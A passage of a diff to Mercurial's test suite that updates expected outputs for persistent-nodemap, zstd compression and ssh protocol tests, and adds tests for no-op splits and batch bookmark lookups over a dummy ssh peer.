size 4 + entry-0002 size 32 + $ cd .. 
diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -56,11 +56,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugformat -v -R up-no-side-data --config format.exp-use-side-data=yes format-variant repo config default @@ -69,11 +71,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo -R up-no-side-data --config format.exp-use-side-data=yes > /dev/null @@ -88,11 +92,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugformat -v -R up-side-data --config format.exp-use-side-data=no format-variant repo config default @@ -101,10 +107,12 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) 
+ persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo -R up-side-data --config format.exp-use-side-data=no > /dev/null diff --git a/tests/test-simplemerge.py b/tests/test-simplemerge.py --- a/tests/test-simplemerge.py +++ b/tests/test-simplemerge.py @@ -141,8 +141,6 @@ """No conflicts because nothing changed""" m3 = Merge3([b'aaa', b'bbb'], [b'aaa', b'bbb'], [b'aaa', b'bbb']) - self.assertEqual(m3.find_unconflicted(), [(0, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 2, 0, 2, 0, 2), (2, 2, 2, 2, 2, 2)], @@ -189,8 +187,6 @@ [b'aaa', b'bbb'], [b'aaa', b'111', b'bbb'], [b'aaa', b'bbb'] ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 1, 2), (2, 2, 3, 3, 2, 2)], @@ -271,8 +267,6 @@ [b'aaa\n', b'222\n', b'bbb\n'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 2, 3), (2, 2, 3, 3, 3, 3)], @@ -323,8 +317,6 @@ [b'aaa', b'222', b'bbb'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (2, 3)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (2, 3, 2, 3, 2, 3), (3, 3, 3, 3, 3, 3)], @@ -338,8 +330,6 @@ [b'aaa', b'222', b'222', b'222', b'222', b'bbb'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (3, 4)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (3, 4, 4, 5, 5, 6), (4, 4, 5, 5, 6, 6)], diff --git a/tests/test-sparse-requirement.t b/tests/test-sparse-requirement.t --- a/tests/test-sparse-requirement.t +++ b/tests/test-sparse-requirement.t @@ -20,6 +20,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog store @@ -38,6 +40,8 @@ exp-sparse fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -57,6 +61,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-split.t b/tests/test-split.t --- a/tests/test-split.t +++ b/tests/test-split.t @@ -1046,3 +1046,101 @@ [ ui.warning|rollback completed] [ ui.error|abort: empty commit message] [10] + +Test that creating an empty split or "no-op" +(identical to original) commit doesn't cause chaos +-------------------------------------------------- + + $ hg init $TESTTMP/noop + $ cd $TESTTMP/noop + $ echo r0 > r0 + $ hg ci -qAm r0 + $ hg phase -p + $ echo foo > foo + $ hg ci -qAm foo + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:ae694b2901bb foo + | + o public 0:222799e2f90b r0 + + $ printf 'd\na\n' | HGEDITOR=cat hg split || true + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] d + + no changes to record + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] a + + HG: Splitting ae694b2901bb. Write commit message for the first split changeset. + foo + + + HG: Enter commit message. Lines beginning with 'HG:' are removed. + HG: Leave message empty to abort commit. + HG: -- + HG: user: test + HG: branch 'default' + HG: added foo + warning: commit already existed in the repository! 
+ $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:ae694b2901bb foo + | + o public 0:222799e2f90b r0 + + +Now try the same thing but modifying the message so we don't trigger the +identical changeset failures + + $ hg init $TESTTMP/noop2 + $ cd $TESTTMP/noop2 + $ echo r0 > r0 + $ hg ci -qAm r0 + $ hg phase -p + $ echo foo > foo + $ hg ci -qAm foo + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:ae694b2901bb foo + | + o public 0:222799e2f90b r0 + + $ cat > $TESTTMP/messages <<EOF + > message1 + > EOF + $ printf 'd\na\n' | HGEDITOR="\"$PYTHON\" $TESTTMP/editor.py" hg split + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] d + + no changes to record + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] a + + EDITOR: HG: Splitting ae694b2901bb. Write commit message for the first split changeset. + EDITOR: foo + EDITOR: + EDITOR: + EDITOR: HG: Enter commit message. Lines beginning with 'HG:' are removed. + EDITOR: HG: Leave message empty to abort commit. + EDITOR: HG: -- + EDITOR: HG: user: test + EDITOR: HG: branch 'default' + EDITOR: HG: added foo + created new head + saved backup bundle to $TESTTMP/noop2/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !) + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:de675559d3f9 message1 (obsstore-off !) + @ draft 2:de675559d3f9 message1 (obsstore-on !) + | + o public 0:222799e2f90b r0 + +#if obsstore-on + $ hg debugobsolete + ae694b2901bb8b0f8c4b5e075ddec0d63468d57a de675559d3f93ffc822c6eb7490e5c73033f17c7 0 * (glob) +#endif diff --git a/tests/test-sqlitestore.t b/tests/test-sqlitestore.t --- a/tests/test-sqlitestore.t +++ b/tests/test-sqlitestore.t @@ -17,6 +17,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -31,6 +33,8 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ (no-zstd !) 
fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -49,6 +53,8 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -62,6 +68,8 @@ exp-sqlite-comp-001=none fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-ssh-batch.t b/tests/test-ssh-batch.t new file mode 100644 --- /dev/null +++ b/tests/test-ssh-batch.t @@ -0,0 +1,15 @@ + $ hg init a + $ cd a + $ touch a; hg commit -qAm_ + $ hg bookmark $(for i in $($TESTDIR/seq.py 0 20); do echo b$i; done) + $ hg clone . ../b -q + $ cd ../b + +Checking that when lookup multiple bookmarks in one go, if one of them +fails (thus causing the sshpeer to be stopped), the errors from the +further lookups don't result in tracebacks. + + $ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a + pulling from ssh://user@dummy/$TESTTMP/b/../a + abort: unknown revision 'nosuchbookmark' + [255] diff --git a/tests/test-ssh-bundle1.t b/tests/test-ssh-bundle1.t --- a/tests/test-ssh-bundle1.t +++ b/tests/test-ssh-bundle1.t @@ -72,8 +72,10 @@ $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream streaming all changes - 4 files to transfer, 602 bytes of data - transferred 602 bytes in * seconds (*) (glob) + 4 files to transfer, 602 bytes of data (no-zstd !) + transferred 602 bytes in * seconds (*) (glob) (no-zstd !) + 4 files to transfer, 621 bytes of data (zstd !) + transferred 621 bytes in * seconds (* */sec) (glob) (zstd !) 
searching for changes no changes found updating to branch default @@ -94,8 +96,10 @@ $ hg -R local-stream book mybook $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/local-stream stream2 streaming all changes - 4 files to transfer, 602 bytes of data - transferred 602 bytes in * seconds (*) (glob) + 4 files to transfer, 602 bytes of data (no-zstd !) + transferred 602 bytes in * seconds (*) (glob) (no-zstd !) + 4 files to transfer, 621 bytes of data (zstd !) + transferred 621 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -482,9 +486,11 @@ sending upgrade request: * proto=exp-ssh-v2-0003 (glob) (sshv2 !) sending hello command sending between command - remote: 463 (sshv1 !) + remote: 444 (sshv1 no-rust !) + remote: 463 (sshv1 rust !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) remote: 1 (sshv1 !) sending protocaps command preparing listkeys for "bookmarks" diff --git a/tests/test-ssh-proto-unbundle.t b/tests/test-ssh-proto-unbundle.t --- a/tests/test-ssh-proto-unbundle.t +++ b/tests/test-ssh-proto-unbundle.t @@ -1,3 +1,10 @@ +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. 
+ + $ cat << EOF >> $HGRCPATH + > [format] + > use-persistent-nodemap = no + > EOF + $ cat > hgrc-sshv2 << EOF > %include $HGRCPATH > [experimental] @@ -56,8 +63,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -109,8 +116,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -235,8 +242,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -293,8 +300,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> 
read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -359,8 +366,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -418,8 +425,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -485,8 +492,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -543,8 +550,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup 
protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -609,8 +616,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -668,8 +675,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -735,8 +742,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -796,8 +803,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 
462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -865,8 +872,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -923,8 +930,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -989,8 +996,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() 
-> 2: o> 1\n @@ -1050,8 +1057,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1119,8 +1126,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1180,8 +1187,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1255,8 +1262,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known 
lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1314,8 +1321,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1382,8 +1389,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1441,8 +1448,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1511,8 +1518,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 
463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1572,8 +1579,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1650,8 +1657,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1715,8 +1722,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1788,8 +1795,8 @@ i> 
0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1843,8 +1850,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1918,8 +1925,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1977,8 +1984,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey 
streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command diff --git a/tests/test-ssh-proto.t b/tests/test-ssh-proto.t --- a/tests/test-ssh-proto.t +++ b/tests/test-ssh-proto.t @@ -1,5 +1,12 @@ #require no-chg +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + + $ cat << EOF >> $HGRCPATH + > [format] + > use-persistent-nodemap = no + > EOF + $ cat > hgrc-sshv2 << EOF > %include $HGRCPATH > [experimental] @@ -64,7 +71,7 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -86,8 +93,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey 